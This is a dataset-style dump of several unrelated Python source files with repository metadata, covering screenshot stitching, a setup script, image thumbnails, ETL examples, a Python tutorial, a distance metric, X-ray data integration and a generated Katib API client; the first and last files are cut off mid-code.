stitched_image.paste(part_image, box=(current_scroll_position.x, current_scroll_position.y))
self.restore_position()
self.restore_origin()
self.switch_to.frames(original_frame)
return stitched_image
def get_stitched_screenshot(self, element_region, wait_before_screenshots, scale_provider):
# type: (Region, int, ScaleProvider) -> Image.Image
"""
Gets a stitched screenshot for specific element
:param element_region: Region of required screenshot
:param wait_before_screenshots: Seconds to wait before taking each screenshot.
:param scale_provider: Scale image if needed.
:return: The full element screenshot.
"""
logger.info('getting stitched element screenshot..')
self._position_provider = self._eyes._element_position_provider
entire_size = self._position_provider.get_entire_size()
logger.debug("Element region: {}".format(element_region))
# Firefox 60 and above make a screenshot of the current frame when other browsers
# make a screenshot of the viewport. So we scroll down to frame at _will_switch_to method
# and add a left margin here.
# TODO: Refactor code. Use EyesScreenshot
if self._frame_chain:
if ((self.browser_name == 'firefox' and self.browser_version < 60.0)
or self.browser_name in ('chrome', 'MicrosoftEdge', 'internet explorer', 'safari')):
element_region.left += int(self._frame_chain.peek.location.x)
screenshot_part_size = {'width': element_region.width,
'height': max(element_region.height - self._MAX_SCROLL_BAR_SIZE,
self._MIN_SCREENSHOT_PART_HEIGHT)}
entire_element = Region(0, 0, entire_size['width'], entire_size['height'])
screenshot_parts = entire_element.get_sub_regions(screenshot_part_size)
viewport = self.get_viewport_size()
screenshot = image_utils.image_from_bytes(base64.b64decode(self.get_screenshot_as_base64()))
scale_provider.update_scale_ratio(screenshot.width)
pixel_ratio = 1 / scale_provider.scale_ratio
need_to_scale = True if pixel_ratio != 1.0 else False
if need_to_scale:
element_region = element_region.scale(scale_provider.device_pixel_ratio)
# Starting with element region size part of the screenshot. Use it as a size template.
stitched_image = Image.new('RGBA', (entire_element.width, entire_element.height))
for part in screenshot_parts:
logger.debug("Taking screenshot for {0}".format(part))
# Scroll to the part's top/left and give it time to stabilize.
self._position_provider.set_position(Point(part.left, part.top))
EyesWebDriver._wait_before_screenshot(wait_before_screenshots)
# Since screen size might cause the scroll to reach only part of the way
current_scroll_position = self._position_provider.get_current_position()
logger.debug("Scrolled To ({0},{1})".format(current_scroll_position.x,
current_scroll_position.y))
part64 = self.get_screenshot_as_base64()
part_image = image_utils.image_from_bytes(base64.b64decode(part64))
# Cut to viewport size the full page screenshot of main frame for some browsers
if self._frame_chain:
if (self.browser_name == 'firefox' and self.browser_version < 60.0
or self.browser_name in ('internet explorer', 'safari')):
# TODO: Refactor this to make main screenshot only once
frame_scroll_position = int(self._frame_chain.peek.location.y)
part_image = image_utils.get_image_part(part_image, Region(top=frame_scroll_position,
height=viewport['height'],
width=viewport['width']))
# We cut original image before scaling to prevent appearing of artifacts
part_image = image_utils.get_image_part(part_image, element_region)
if need_to_scale:
part_image = image_utils.scale_image(part_image, 1.0 / pixel_ratio)
# first iteration
if stitched_image is None:
stitched_image = part_image
continue
stitched_image.paste(part_image, box=(current_scroll_position.x, current_scroll_position.y))
self._position_provider = self._origin_position_provider
return stitched_image
@property
def switch_to(self):
return _EyesSwitchTo(self, self.driver.switch_to)
@property
def current_offset(self):
# type: () -> Point
"""
Return the current offset of the context we're in (e.g., due to switching into frames)
"""
x, y = 0, 0
for frame in self._frame_chain:
x += frame.location['x']
y += frame.location['y']
return Point(x, y)
def execute_script(self, script, *args):
return self.driver.execute_script(script, *args)
def get_window_size(self, windowHandle='current'):
return self.driver.get_window_size(windowHandle)
def set_window_size(self, width, height, windowHandle='current'):
self.driver.set_window_size(width, height, windowHandle)
def set_window_position(self, x, y, windowHandle='current'):
self.driver.set_window_position(x, y, windowHandle)
| 40.054545
| 116
| 0.63771
|
b30bc4235fdb74d9c9fbd729007fc4ebcc10583e
| 1,898
|
py
|
Python
|
vimfiles/bundle/vim-python/submodules/autopep8/setup.py
|
BHills15/vimrc
|
150b2e0bea7afd09226697a061206f8b812cf5cc
|
[
"MIT"
] | 1
|
2022-02-09T15:48:13.000Z
|
2022-02-09T15:48:13.000Z
|
vimfiles/bundle/vim-python/submodules/autopep8/setup.py
|
BHills15/vimrc
|
150b2e0bea7afd09226697a061206f8b812cf5cc
|
[
"MIT"
] | null | null | null |
vimfiles/bundle/vim-python/submodules/autopep8/setup.py
|
BHills15/vimrc
|
150b2e0bea7afd09226697a061206f8b812cf5cc
|
[
"MIT"
] | 1
|
2022-02-09T15:49:18.000Z
|
2022-02-09T15:49:18.000Z
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""Setup for autopep8."""
import ast
import io
from setuptools import setup
INSTALL_REQUIRES = (
['pycodestyle >= 2.3']
)
def version():
"""Return version string."""
with io.open('autopep8.py') as input_file:
for line in input_file:
if line.startswith('__version__'):
return ast.parse(line).body[0].value.s
with io.open('README.rst') as readme:
setup(
name='autopep8',
version=version(),
description='A tool that automatically formats Python code to conform '
'to the PEP 8 style guide',
long_description=readme.read(),
license='Expat License',
author='Hideo Hattori',
author_email='hhatto.jp@gmail.com',
url='https://github.com/hhatto/autopep8',
classifiers=[
'Development Status :: 5 - Production/Stable',
'Environment :: Console',
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
'Topic :: Software Development :: Libraries :: Python Modules',
'Topic :: Software Development :: Quality Assurance',
],
keywords='automation, pep8, format, pycodestyle',
install_requires=INSTALL_REQUIRES,
test_suite='test.test_autopep8',
py_modules=['autopep8'],
zip_safe=False,
entry_points={'console_scripts': ['autopep8 = autopep8:main']},
)
| 32.169492
| 79
| 0.578504
|
47a98d71cd65b0005881e7b1da2b8b415c81f3b1
| 757
|
py
|
Python
|
fxwebgen/imaging.py
|
tiliado/fxwebgen
|
5d1c5120b27fc13b6b45ee4e0017771271c3c3e0
|
[
"BSD-2-Clause"
] | null | null | null |
fxwebgen/imaging.py
|
tiliado/fxwebgen
|
5d1c5120b27fc13b6b45ee4e0017771271c3c3e0
|
[
"BSD-2-Clause"
] | 13
|
2018-08-06T15:25:50.000Z
|
2019-04-14T14:09:22.000Z
|
fxwebgen/imaging.py
|
tiliado/fxwebgen
|
5d1c5120b27fc13b6b45ee4e0017771271c3c3e0
|
[
"BSD-2-Clause"
] | null | null | null |
# Copyright 2018 Jiří Janoušek <janousek.jiri@gmail.com>
# Licensed under BSD-2-Clause license - see file LICENSE for details.
from typing import Optional
from PIL import Image
from resizeimage import resizeimage
def create_thumbnail(input_file: str, output_file: str, width: Optional[int], height: Optional[int]) -> None:
with open(input_file, 'rb') as fh:
img = Image.open(fh)
if width and height:
img = resizeimage.resize_thumbnail(img, [width, height])
elif width:
img = resizeimage.resize_width(img, width)
elif height:
img = resizeimage.resize_height(img, height)
else:
raise ValueError('Width or height must be specified.')
img.save(output_file)
| 34.409091
| 109
| 0.67107
|
386ed6587bf5fee377824cd91d9a6aa3413ccfd0
| 1,639
|
py
|
Python
|
example/example_flow.py
|
rdcli/rdc.etl
|
8aa70c1f31f4bc18b2e9e37d96db39041e4b8eb8
|
[
"Apache-2.0"
] | 7
|
2015-11-10T21:28:07.000Z
|
2021-03-16T17:51:16.000Z
|
example/example_flow.py
|
rdcli/rdc.etl
|
8aa70c1f31f4bc18b2e9e37d96db39041e4b8eb8
|
[
"Apache-2.0"
] | 4
|
2018-01-29T07:23:07.000Z
|
2018-01-29T07:23:43.000Z
|
example/example_flow.py
|
rdcli/rdc.etl
|
8aa70c1f31f4bc18b2e9e37d96db39041e4b8eb8
|
[
"Apache-2.0"
] | 2
|
2016-11-09T05:14:05.000Z
|
2017-07-22T13:25:56.000Z
|
# -*- coding: utf-8 -*-
#
# Copyright 2012-2014 Romain Dorgueil
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from rdc.etl.extra.example import Harness, build_producer, run
from rdc.etl.io import STDIN2
from rdc.etl.status.console import ConsoleStatus
from rdc.etl.transform.flow.sort import Sort
from rdc.etl.transform.flow.sortedjoin import SortedJoin
from rdc.etl.transform.util import Log
print('#################')
print('# Software sort #')
print('#################')
print
print('Producer -> Sort -> Log')
h = Harness()
h.status.append(ConsoleStatus())
p1 = build_producer('Producer 1')
h.add_chain(p1, Sort(key=('id',)), Log())
run(h)
print('###############')
print('# Sorted Join #')
print('###############')
print
print("Producer1 -> Sort -(stdin)---> SortedJoin --> Log")
print("Producer2 -> Sort -(stdin2)-'")
h = Harness()
h.status.append(ConsoleStatus())
p1 = build_producer('Producer 1')
p2 = build_producer('Producer 2', get_value=lambda id: int(id) * 42, value_name='price')
sj = SortedJoin(key=('id', ))
h.add_chain(p1, Sort(key=('id',)), sj, Log())
h.add_chain(p2, Sort(key=('id',)), output=(sj, STDIN2, ))
run(h)
| 31.519231
| 88
| 0.687614
|
7ca09d3a18bc2078df525b6c198f3189a4c775f8
| 3,008
|
py
|
Python
|
2-Conditional Logic and more basics.py
|
Alirezak2n/Python-Tutorials
|
28c6b40c7237032f80c4f0556ad1bcaceccef088
|
[
"MIT"
] | null | null | null |
2-Conditional Logic and more basics.py
|
Alirezak2n/Python-Tutorials
|
28c6b40c7237032f80c4f0556ad1bcaceccef088
|
[
"MIT"
] | null | null | null |
2-Conditional Logic and more basics.py
|
Alirezak2n/Python-Tutorials
|
28c6b40c7237032f80c4f0556ad1bcaceccef088
|
[
"MIT"
] | null | null | null |
# If Operator
if "Hello" and 5 :
print("Alireza Is Smart ")
elif 2 == 3:
print("ZOOOOOO")
else:
print("WOW")
# Ternary Operator or Conditional expression
#condition_if_true if condition else condition_if_false
fact="alireza will be successfull" if 5 else "Whatever"
print(fact)
print("aaa") if 2==3 else print("sss")
# Short Circuiting
if True or False:
print("second part does n't matter due to short circuiting")
# logical operator
print(4<3)
print(4==5)
print('a'<'b')
print('c'<'b')
print(1<=1)
print(1!=2)
print(not (True))
print(10 == 10.0) # should have same value
print(10 is 10.0) # should be exactly the same
a = [1,2,3]
b = [1,2,3]
print(a is b) # false because they are in different memory space
print([] is []) # two list in two different space
# Truthy and Falsy
print(bool("Hello"))
print(bool(5))
print(bool(""))
print(bool(0))
# For Operator
for item in [1,2]: # item can be anything its just a variable
for x in {'name': 'Alireza', 'age': 25,
'can_do it': True}.items(): # as a dictionary we can use .keys or .values too
print(item, x)
key, value = x
print(key, value)
for key,value in {'name':'Alireza','age':25,'can_do it':True}.items(): # another way which we use without having to write another line
print(key,value) # only list,dict,tuple,set,string that are collection of items are iterable not int or...
print(item)
print(range(100))
print(range(0,100)) # both of them are same
for _ in range(10,0,-2): # if we want to do reverse we should take care of our range to start from big to small
print(_)
print(list(range(10)))
# Enumerate
for i,j in enumerate("Alireza"): # its like range but gives the index too
print(i,j)
if j=='r':
print(f'the index of r is {i}')
for i in enumerate([1,2,3]):
print(i)
# While
i = 0
while i < 1:
print(i)
i+=1
else:
print('DOne')
# Break,Pass,Continue
for item in [1,2,3]:
print(item)
break # it will come out of the loop completely
for item in [1,2,3]:
continue # it will come out of current loop and start again at loop
print(item)
for item in [1,2,3]:
pass # it does nothing, just pass it to next line and when we have nothing in loop it doesnt bring error
# Variable and Constant and dunder
PI = 3.14 # Constant, it means it should not be changed
pi = 3.14 # a variable
a, b, c = 1, 2, 3
print(c, a, b)
__pi__ = 3.14 # a dunder, it is better not to do
# Expressions and Statements
iq = 100 / 20 # 100/20 is an expression but the whole line is a statement
# Augmented Assignment Operator
some_value = 5
# some_value = some_value + 2
print(some_value)
some_value += 2 # operator comes in the left of the equation
print(some_value)
some_value -= 2
print(some_value)
# Math Functions
print(round(3.4))
print(round(3.6))
print(abs(-16))
# Complex
# Binary
print(bin(5))
print((int('0b101', 2)))
| 28.923077
| 140
| 0.641955
|
8369da3f4270cd37e877812174d5d850763e4967
| 1,703
|
py
|
Python
|
python/pred.py
|
neuralsystems/PRED
|
b3fb5e2604b88f44173767d8cf77aaff5171a7dc
|
[
"CC0-1.0"
] | null | null | null |
python/pred.py
|
neuralsystems/PRED
|
b3fb5e2604b88f44173767d8cf77aaff5171a7dc
|
[
"CC0-1.0"
] | null | null | null |
python/pred.py
|
neuralsystems/PRED
|
b3fb5e2604b88f44173767d8cf77aaff5171a7dc
|
[
"CC0-1.0"
] | null | null | null |
"""
# Author: Aarush Mohit Mittal
# Contact: aarush (dot) mohit (at) gmail (dot) com
# Version: 0.1
"""
"""
Changelog:
v0.1 (2021-08-12):
- Initial release with class-vector numpy support
"""
import numpy as np
from itertools import combinations
def pred(data):
'''
Description:
This function calculates Class-Vector Pairwise Relative Distance (PRED) from a 2-d or 3-d arrays of any size.
Arguments:
1. data: 2-d or 3-d numpy array of any size. For 3-d arrays, values along the 3rd dimension are used as
arrays for each Class and Vector combination. There must be at least 2 rows and 2 columns. Each column is
considered as a Class and each row is considered as a Vector.
Returns:
1. S: S is a column array of length n*(n-1)/2, where n = data.shape[0], corresponding to all Vector pairs.
Each value of S is averaged over all m*(m-1)/2 pairs of Classes, where m = data.shape[1]. NaNs are ignored
while calculating the mean.
'''
n_row = data.shape[0]
n_col = data.shape[1]
row_comb = list(combinations(np.arange(n_row), 2))
col_comb = list(combinations(np.arange(n_col), 2))
s = np.zeros((len(row_comb), 1))
for i, row_pair in enumerate(row_comb):
temp_s = []
for col_pair in col_comb:
temp_data = data[row_pair, :][:, col_pair][:]
temp_s.append(computepred(temp_data))
s[i] = np.nanmean(temp_s)
return s
def computepred(data):
d_2 = np.linalg.norm(data[0, 0] - data[1, 1]) ** 2 + np.linalg.norm(data[0, 1] - data[1, 0]) ** 2
d_1 = np.linalg.norm(data[0, 0] - data[1, 0]) ** 2 + np.linalg.norm(data[0, 1] - data[1, 1]) ** 2
return (d_2 - d_1) / (d_2 + d_1)
| 34.06
| 113
| 0.641221
|
42c1676b68d404546793b95595fa1d97cf51f506
| 4,301
|
py
|
Python
|
apps/waxs_integrate.py
|
alexbjorling/nanomax-analysis-utils
|
e208d098243e28a90004c6e1c5fb69251177d23e
|
[
"MIT"
] | 3
|
2017-07-19T10:25:26.000Z
|
2019-12-17T13:47:06.000Z
|
apps/waxs_integrate.py
|
alexbjorling/nanomax-analysis-utils
|
e208d098243e28a90004c6e1c5fb69251177d23e
|
[
"MIT"
] | 1
|
2021-04-07T10:00:33.000Z
|
2021-04-07T10:20:36.000Z
|
apps/waxs_integrate.py
|
alexbjorling/nanomax-analysis-utils
|
e208d098243e28a90004c6e1c5fb69251177d23e
|
[
"MIT"
] | 1
|
2020-10-15T12:05:42.000Z
|
2020-10-15T12:05:42.000Z
|
"""
Script which radially integrates the 2D data contained in a hdf5 file
or list of files.
"""
import pyFAI, fabio
import h5py
import numpy as np
import os, time, sys, argparse
### Parse input
parser = argparse.ArgumentParser(
description='This script integrates all detector frames in a hdf5 file or list of files.',
formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument('poni_file', type=str,
help='The pyFAI calibration file. Determines what data to take from the input file.')
parser.add_argument('input_files', type=str, nargs='*',
help='The file(s) containing the input data. They all have to be in the same folder unless an absolute output path is given.')
parser.add_argument('mask_file', type=str,
help='Mask file, edf format from pyFAI.')
parser.add_argument('--output_folder', type=str, dest='output_folder', default=None,
help='Output folder. If relative, it refers to the input folder. By default uses the an analog of the input folder under ../../process/radial_integration/<sample name>.')
parser.add_argument('--nbins', type=int, dest='nbins', default=2048,
help='Number of q bins.')
args = parser.parse_args()
### work out where the input folder is and if it is unique if needs be
if (not args.output_folder) or (not args.output_folder[0] == '/'):
input_folders = [os.path.dirname(f) for f in args.input_files]
input_folders = list(set(input_folders))
if not len(input_folders) == 1:
raise InputError('Since the files are in different places, you have to specify an absolute output folder.')
input_folder = input_folders[0]
### work out where to put the data
if not args.output_folder:
output_folder = os.path.join(input_folder.split('/raw/')[0],
'process/radial_integration',
os.path.basename(os.path.abspath(input_folder)))
elif args.output_folder[0] == '/':
# absolute path
output_folder = args.output_folder
else:
# relative path
output_folder = os.path.abspath(os.path.join(input_folder, args.output_folder))
### define some helper functions
def dict_walk(dct, ignore=[]):
"""
Recursively walks through a dict, returning each non-dict value.
"""
if str(ignore) == ignore:
ignore = [ignore,]
for k, v in dct.items():
if hasattr(v, 'items'):
if v.name.split('/')[-1] in ignore:
continue
for v_ in dict_walk(v, ignore=ignore):
yield v_
else:
yield v
def images(fp, shape=None, ignore=[]):
"""
Iterates over the 2D images, optionally of a certain shape, of
an hdf5 file.
"""
for v in dict_walk(fp, ignore=ignore):
if len(v.shape) >= 2 and (shape is None or v.shape[-2:] == shape):
if len(v.shape) == 2:
v = np.reshape(v, (1,)+v.shape)
for i, im in enumerate(v):
print('image %i'%i)
yield im
### Do the work
integrator = pyFAI.load(args.poni_file)
for input_file in args.input_files:
inputfn = os.path.basename(input_file)
print('*** Integrating %s' % inputfn)
outputfn = inputfn.split('.')[0] + '_waxs.' + inputfn.split('.')[-1]
output_file = os.path.join(output_folder, outputfn)
assert '/raw/' not in output_file
if not os.path.exists(os.path.dirname(output_file)):
print('****** Creating directory %s' % os.path.dirname(output_file))
os.makedirs(os.path.dirname(output_file))
mask = fabio.open(args.mask_file).data
shape = mask.shape
print('looking for images of shape %s' % str(shape))
intensities = []
with h5py.File(input_file, 'r') as fpin:
for im in images(fpin, ignore='instrument', shape=shape):
if not im.shape == integrator.get_shape():
print('skipping data %s' % (str(im.shape)))
continue
out = integrator.integrate1d(data=im, npt=args.nbins, filename=None, mask=mask)
q, I = out.radial, out.intensity
intensities.append(I)
I = np.array(intensities)
with h5py.File(output_file, 'w') as fpout:
fpout['I'] = I
fpout['q'] = q
| 39.1
| 190
| 0.627993
|
01194d8c25f7a9f93c4523b6d9b22ff1bf54455a
| 24,943
|
py
|
Python
|
sdk/python/v1beta1/kubeflow/katib/api_client.py
|
ChenjunZou/katib
|
6a07daae796c29d24f63375cce71b75c4eee8d9c
|
[
"Apache-2.0"
] | null | null | null |
sdk/python/v1beta1/kubeflow/katib/api_client.py
|
ChenjunZou/katib
|
6a07daae796c29d24f63375cce71b75c4eee8d9c
|
[
"Apache-2.0"
] | null | null | null |
sdk/python/v1beta1/kubeflow/katib/api_client.py
|
ChenjunZou/katib
|
6a07daae796c29d24f63375cce71b75c4eee8d9c
|
[
"Apache-2.0"
] | null | null | null |
# coding: utf-8
"""
Katib
Swagger description for Katib # noqa: E501
OpenAPI spec version: v1beta1-0.1
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import datetime
import json
import mimetypes
from multiprocessing.pool import ThreadPool
import os
import re
import tempfile
# python 2 and python 3 compatibility library
import six
from six.moves.urllib.parse import quote
from kubeflow.katib.configuration import Configuration
import kubeflow.katib.models
from kubeflow.katib import rest
class ApiClient(object):
"""Generic API client for Swagger client library builds.
Swagger generic API client. This client handles the client-
server communication, and is invariant across implementations. Specifics of
the methods and models for each application are generated from the Swagger
templates.
NOTE: This class is auto generated by the swagger code generator program.
Ref: https://github.com/swagger-api/swagger-codegen
Do not edit the class manually.
:param configuration: .Configuration object for this client
:param header_name: a header to pass when making calls to the API.
:param header_value: a header value to pass when making calls to
the API.
:param cookie: a cookie to include in the header when making calls
to the API
"""
PRIMITIVE_TYPES = (float, bool, bytes, six.text_type) + six.integer_types
NATIVE_TYPES_MAPPING = {
'int': int,
'long': int if six.PY3 else long, # noqa: F821
'float': float,
'str': str,
'bool': bool,
'date': datetime.date,
'datetime': datetime.datetime,
'object': object,
}
def __init__(self, configuration=None, header_name=None, header_value=None,
cookie=None):
if configuration is None:
configuration = Configuration()
self.configuration = configuration
# Use the pool property to lazily initialize the ThreadPool.
self._pool = None
self.rest_client = rest.RESTClientObject(configuration)
self.default_headers = {}
if header_name is not None:
self.default_headers[header_name] = header_value
self.cookie = cookie
# Set default User-Agent.
self.user_agent = 'Swagger-Codegen/0.1/python'
def __del__(self):
if self._pool is not None:
self._pool.close()
self._pool.join()
@property
def pool(self):
if self._pool is None:
self._pool = ThreadPool()
return self._pool
@property
def user_agent(self):
"""User agent for this API client"""
return self.default_headers['User-Agent']
@user_agent.setter
def user_agent(self, value):
self.default_headers['User-Agent'] = value
def set_default_header(self, header_name, header_value):
self.default_headers[header_name] = header_value
def __call_api(
self, resource_path, method, path_params=None,
query_params=None, header_params=None, body=None, post_params=None,
files=None, response_type=None, auth_settings=None,
_return_http_data_only=None, collection_formats=None,
_preload_content=True, _request_timeout=None):
config = self.configuration
# header parameters
header_params = header_params or {}
header_params.update(self.default_headers)
if self.cookie:
header_params['Cookie'] = self.cookie
if header_params:
header_params = self.sanitize_for_serialization(header_params)
header_params = dict(self.parameters_to_tuples(header_params,
collection_formats))
# path parameters
if path_params:
path_params = self.sanitize_for_serialization(path_params)
path_params = self.parameters_to_tuples(path_params,
collection_formats)
for k, v in path_params:
# specified safe chars, encode everything
resource_path = resource_path.replace(
'{%s}' % k,
quote(str(v), safe=config.safe_chars_for_path_param)
)
# query parameters
if query_params:
query_params = self.sanitize_for_serialization(query_params)
query_params = self.parameters_to_tuples(query_params,
collection_formats)
# post parameters
if post_params or files:
post_params = self.prepare_post_parameters(post_params, files)
post_params = self.sanitize_for_serialization(post_params)
post_params = self.parameters_to_tuples(post_params,
collection_formats)
# auth setting
self.update_params_for_auth(header_params, query_params, auth_settings)
# body
if body:
body = self.sanitize_for_serialization(body)
# request url
url = self.configuration.host + resource_path
# perform request and return response
response_data = self.request(
method, url, query_params=query_params, headers=header_params,
post_params=post_params, body=body,
_preload_content=_preload_content,
_request_timeout=_request_timeout)
self.last_response = response_data
return_data = response_data
if _preload_content:
# deserialize response data
if response_type:
return_data = self.deserialize(response_data, response_type)
else:
return_data = None
if _return_http_data_only:
return (return_data)
else:
return (return_data, response_data.status,
response_data.getheaders())
def sanitize_for_serialization(self, obj):
"""Builds a JSON POST object.
If obj is None, return None.
If obj is str, int, long, float, bool, return directly.
If obj is datetime.datetime, datetime.date
convert to string in iso8601 format.
If obj is list, sanitize each element in the list.
If obj is dict, return the dict.
If obj is swagger model, return the properties dict.
:param obj: The data to serialize.
:return: The serialized form of data.
"""
if obj is None:
return None
elif isinstance(obj, self.PRIMITIVE_TYPES):
return obj
elif isinstance(obj, list):
return [self.sanitize_for_serialization(sub_obj)
for sub_obj in obj]
elif isinstance(obj, tuple):
return tuple(self.sanitize_for_serialization(sub_obj)
for sub_obj in obj)
elif isinstance(obj, (datetime.datetime, datetime.date)):
return obj.isoformat()
if isinstance(obj, dict):
obj_dict = obj
else:
# Convert model obj to dict except
# attributes `swagger_types`, `attribute_map`
# and attributes which value is not None.
# Convert attribute name to json key in
# model definition for request.
obj_dict = {obj.attribute_map[attr]: getattr(obj, attr)
for attr, _ in six.iteritems(obj.swagger_types)
if getattr(obj, attr) is not None}
return {key: self.sanitize_for_serialization(val)
for key, val in six.iteritems(obj_dict)}
def deserialize(self, response, response_type):
"""Deserializes response into an object.
:param response: RESTResponse object to be deserialized.
:param response_type: class literal for
deserialized object, or string of class name.
:return: deserialized object.
"""
# handle file downloading
# save response body into a tmp file and return the instance
if response_type == "file":
return self.__deserialize_file(response)
# fetch data from response object
try:
data = json.loads(response.data)
except ValueError:
data = response.data
return self.__deserialize(data, response_type)
def __deserialize(self, data, klass):
"""Deserializes dict, list, str into an object.
:param data: dict, list or str.
:param klass: class literal, or string of class name.
:return: object.
"""
if data is None:
return None
if type(klass) == str:
if klass.startswith('list['):
sub_kls = re.match(r'list\[(.*)\]', klass).group(1)
return [self.__deserialize(sub_data, sub_kls)
for sub_data in data]
if klass.startswith('dict('):
sub_kls = re.match(r'dict\(([^,]*), (.*)\)', klass).group(2)
return {k: self.__deserialize(v, sub_kls)
for k, v in six.iteritems(data)}
# convert str to class
if klass in self.NATIVE_TYPES_MAPPING:
klass = self.NATIVE_TYPES_MAPPING[klass]
else:
klass = getattr(katib.models, klass)
if klass in self.PRIMITIVE_TYPES:
return self.__deserialize_primitive(data, klass)
elif klass == object:
return self.__deserialize_object(data)
elif klass == datetime.date:
return self.__deserialize_date(data)
elif klass == datetime.datetime:
return self.__deserialize_datatime(data)
else:
return self.__deserialize_model(data, klass)
def call_api(self, resource_path, method,
path_params=None, query_params=None, header_params=None,
body=None, post_params=None, files=None,
response_type=None, auth_settings=None, async_req=None,
_return_http_data_only=None, collection_formats=None,
_preload_content=True, _request_timeout=None):
"""Makes the HTTP request (synchronous) and returns deserialized data.
To make an async request, set the async_req parameter.
:param resource_path: Path to method endpoint.
:param method: Method to call.
:param path_params: Path parameters in the url.
:param query_params: Query parameters in the url.
:param header_params: Header parameters to be
placed in the request header.
:param body: Request body.
:param post_params dict: Request post form parameters,
for `application/x-www-form-urlencoded`, `multipart/form-data`.
:param auth_settings list: Auth Settings names for the request.
:param response: Response data type.
:param files dict: key -> filename, value -> filepath,
for `multipart/form-data`.
:param async_req bool: execute request asynchronously
:param _return_http_data_only: response data without head status code
and headers
:param collection_formats: dict of collection formats for path, query,
header, and post parameters.
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return:
If async_req parameter is True,
the request will be called asynchronously.
The method will return the request thread.
If parameter async_req is False or missing,
then the method will return the response directly.
"""
if not async_req:
return self.__call_api(resource_path, method,
path_params, query_params, header_params,
body, post_params, files,
response_type, auth_settings,
_return_http_data_only, collection_formats,
_preload_content, _request_timeout)
else:
thread = self.pool.apply_async(self.__call_api, (resource_path,
method, path_params, query_params,
header_params, body,
post_params, files,
response_type, auth_settings,
_return_http_data_only,
collection_formats,
_preload_content, _request_timeout))
return thread
def request(self, method, url, query_params=None, headers=None,
post_params=None, body=None, _preload_content=True,
_request_timeout=None):
"""Makes the HTTP request using RESTClient."""
if method == "GET":
return self.rest_client.GET(url,
query_params=query_params,
_preload_content=_preload_content,
_request_timeout=_request_timeout,
headers=headers)
elif method == "HEAD":
return self.rest_client.HEAD(url,
query_params=query_params,
_preload_content=_preload_content,
_request_timeout=_request_timeout,
headers=headers)
elif method == "OPTIONS":
return self.rest_client.OPTIONS(url,
query_params=query_params,
headers=headers,
post_params=post_params,
_preload_content=_preload_content,
_request_timeout=_request_timeout,
body=body)
elif method == "POST":
return self.rest_client.POST(url,
query_params=query_params,
headers=headers,
post_params=post_params,
_preload_content=_preload_content,
_request_timeout=_request_timeout,
body=body)
elif method == "PUT":
return self.rest_client.PUT(url,
query_params=query_params,
headers=headers,
post_params=post_params,
_preload_content=_preload_content,
_request_timeout=_request_timeout,
body=body)
elif method == "PATCH":
return self.rest_client.PATCH(url,
query_params=query_params,
headers=headers,
post_params=post_params,
_preload_content=_preload_content,
_request_timeout=_request_timeout,
body=body)
elif method == "DELETE":
return self.rest_client.DELETE(url,
query_params=query_params,
headers=headers,
_preload_content=_preload_content,
_request_timeout=_request_timeout,
body=body)
else:
raise ValueError(
"http method must be `GET`, `HEAD`, `OPTIONS`,"
" `POST`, `PATCH`, `PUT` or `DELETE`."
)
def parameters_to_tuples(self, params, collection_formats):
"""Get parameters as list of tuples, formatting collections.
:param params: Parameters as dict or list of two-tuples
:param dict collection_formats: Parameter collection formats
:return: Parameters as list of tuples, collections formatted
"""
new_params = []
if collection_formats is None:
collection_formats = {}
for k, v in six.iteritems(params) if isinstance(params, dict) else params: # noqa: E501
if k in collection_formats:
collection_format = collection_formats[k]
if collection_format == 'multi':
new_params.extend((k, value) for value in v)
else:
if collection_format == 'ssv':
delimiter = ' '
elif collection_format == 'tsv':
delimiter = '\t'
elif collection_format == 'pipes':
delimiter = '|'
else: # csv is the default
delimiter = ','
new_params.append(
(k, delimiter.join(str(value) for value in v)))
else:
new_params.append((k, v))
return new_params
def prepare_post_parameters(self, post_params=None, files=None):
"""Builds form parameters.
:param post_params: Normal form parameters.
:param files: File parameters.
:return: Form parameters with files.
"""
params = []
if post_params:
params = post_params
if files:
for k, v in six.iteritems(files):
if not v:
continue
file_names = v if type(v) is list else [v]
for n in file_names:
with open(n, 'rb') as f:
filename = os.path.basename(f.name)
filedata = f.read()
mimetype = (mimetypes.guess_type(filename)[0] or
'application/octet-stream')
params.append(
tuple([k, tuple([filename, filedata, mimetype])]))
return params
def select_header_accept(self, accepts):
"""Returns `Accept` based on an array of accepts provided.
:param accepts: List of headers.
:return: Accept (e.g. application/json).
"""
if not accepts:
return
accepts = [x.lower() for x in accepts]
if 'application/json' in accepts:
return 'application/json'
else:
return ', '.join(accepts)
def select_header_content_type(self, content_types):
"""Returns `Content-Type` based on an array of content_types provided.
:param content_types: List of content-types.
:return: Content-Type (e.g. application/json).
"""
if not content_types:
return 'application/json'
content_types = [x.lower() for x in content_types]
if 'application/json' in content_types or '*/*' in content_types:
return 'application/json'
else:
return content_types[0]
def update_params_for_auth(self, headers, querys, auth_settings):
"""Updates header and query params based on authentication setting.
:param headers: Header parameters dict to be updated.
:param querys: Query parameters tuple list to be updated.
:param auth_settings: Authentication setting identifiers list.
"""
if not auth_settings:
return
for auth in auth_settings:
auth_setting = self.configuration.auth_settings().get(auth)
if auth_setting:
if not auth_setting['value']:
continue
elif auth_setting['in'] == 'header':
headers[auth_setting['key']] = auth_setting['value']
elif auth_setting['in'] == 'query':
querys.append((auth_setting['key'], auth_setting['value']))
else:
raise ValueError(
'Authentication token must be in `query` or `header`'
)
def __deserialize_file(self, response):
"""Deserializes body to file
Saves response body into a file in a temporary folder,
using the filename from the `Content-Disposition` header if provided.
:param response: RESTResponse.
